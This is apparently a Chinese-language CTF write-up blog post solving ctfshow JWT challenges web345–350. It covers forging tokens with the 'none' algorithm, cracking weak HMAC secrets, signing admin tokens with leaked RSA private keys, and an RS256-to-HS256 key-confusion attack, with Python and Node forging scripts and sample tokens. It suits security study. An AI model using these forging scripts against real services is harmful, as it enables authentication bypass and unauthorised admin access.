ctfshow - web345- 350 - jwt

题目都是ctfshow的,版权是ctfshow的!!!!!!如果侵权,联系立马删除

web345

my thought

看到源码后,访问/admin,没发现啥东西

看看auth

eyJhbGciOiJOb25lIiwidHlwIjoiand0In0.W3siaXNzIjoiYWRtaW4iLCJpYXQiOjE2NTIyMzcxMjgsImV4cCI6MTY1MjI0NDMyOCwibmJmIjoxNjUyMjM3MTI4LCJzdWIiOiJ1c2VyIiwianRpIjoiNDJmYWQ1NzlhNzEzZTE1NjczNzQ2Yzc5MTBkM2MzMmEifV0
->
eyJhbGciOiJOb25lIiwidHlwIjoiand0In0.W3siaXNzIjoiYWRtaW4iLCJpYXQiOjE2NTIyMzcxMjgsImV4cCI6MTY1MjI0NDMyOCwibmJmIjoxNjUyMjM3MTI4LCJzdWIiOiJhZG1pbiIsImp0aSI6IjQyZmFkNTc5YTcxM2UxNTY3Mzc0NmM3OTEwZDNjMzJhIn1d
eyJhbGciOiJOb25lIiwidHlwIjoiand0In0.W3sic3ViIjoiYWRtaW4ifV0

发现没有签名认证部分,直接修改cookie,访问/admin/


web346——修改签名算法

题目

该题的cookie中使用hs256

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTY1MzIwODQ5MywiZXhwIjoxNjUzMjE1NjkzLCJuYmYiOjE2NTMyMDg0OTMsInN1YiI6InVzZXIiLCJqdGkiOiIzNjE5NjFhNjM0YTU3MzJhYTUzMmYyZmU5MDhmYmE0MiJ9.K8EAszlFstvCfSdR_Q9-qwX8nBBpa366Q7VCyvEKAec

right way

将header的加密算法改为none,跑出cookie

import jwt

# payload
token_dict = {
  "iss": "admin",
  "iat": 1653273637,
  "exp": 1653280837,
  "nbf": 1653273637,
  "sub": "admin",
  "jti": "8219ad40fe3524c013409606c9d9ecfc"
}

headers = {
  "alg": "none",
  "typ": "JWT"
}
jwt_token = jwt.encode(token_dict,          # payload, 有效载体
                       "",                  # 进行加密签名的密钥
                       algorithm="none",       # 指明签名算法方式, 默认也是HS256
                       headers=headers 
                       # json web token 数据结构包含两部分, payload(有效载体), headers(标头)
                       )

print(jwt_token)

该方法跑了后修改cookie没用。

密钥为123456,在jwt.io获得新的cookie。


web347

题目

同上


web348——爆破

题目

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTY1MzI3NTY1NCwiZXhwIjoxNjUzMjgyODU0LCJuYmYiOjE2NTMyNzU2NTQsInN1YiI6InVzZXIiLCJqdGkiOiJhOWY4ZGRlNzBjNDdlNWM1N2YxYWI3OTRlMTliNzkwOSJ9.2S40MftC-VtFmAOhkCDxkUkc4ktvt8YRkoDFv1nwElQ

my thought

上c-jwt-cracker

密钥为aaab,在jwt.io生成新的cookie。


web349——RSA公私钥泄露

题目

app.js

/* GET home page. */
router.get('/', function(req, res, next) {
  res.type('html');
  var privateKey = fs.readFileSync(process.cwd()+'//public//private.key');
  var token = jwt.sign({ user: 'user' }, privateKey, { algorithm: 'RS256' });
  res.cookie('auth',token);
  res.end('where is flag?');
  
});

router.post('/',function(req,res,next){
    var flag="flag_here";
    res.type('html');
    var auth = req.cookies.auth;
    var cert = fs.readFileSync(process.cwd()+'//public/public.key');  // get public key
    jwt.verify(auth, cert, function(err, decoded) {
      if(decoded.user==='admin'){
          res.end(flag);
      }else{
          res.end('you are not admin');
      }
    });
});

right way

看代码发现public.key和private.key均放在public目录下,猜测可以直接访问。

发现公私钥泄露。

payload

node

const jwt = require('jsonwebtoken');
var fs = require('fs');
var privateKey = fs.readFileSync('private.key');
var token = jwt.sign({ user: 'admin' }, privateKey, { algorithm: 'RS256' });
console.log(token)

python2

import jwt
public = open('private.key', 'r').read()
payload={"user":"admin"}
print(jwt.encode(payload, key=public, algorithm='RS256'))
# python2运行

jwt.io也可以,不过尝试后认证失败


web350——密钥混淆攻击

题目

该题给了环境,routes/index.js中仅有公钥信息,

right way

jwt攻击参考文章

将rs256改为hs256

payload

const jwt = require('jsonwebtoken');
var fs = require('fs');
var privateKey = fs.readFileSync('public.key');
var token = jwt.sign({ user: 'admin' }, privateKey, { algorithm: 'HS256' });
console.log(token)

防御

JWT配置应该只允许使用HMAC算法或公钥算法,决不能同时使用这两种算法

——by Y4tacker


参考

https://blog.csdn.net/solitudi/article/details/112525267

https://blog.csdn.net/cosmoslin/article/details/120540470

https://blog.csdn.net/cosmoslin/article/details/120540470

本文链接:

https://littlewhite.fun/494.html
1 + 6 =
快来做第一个评论的人吧~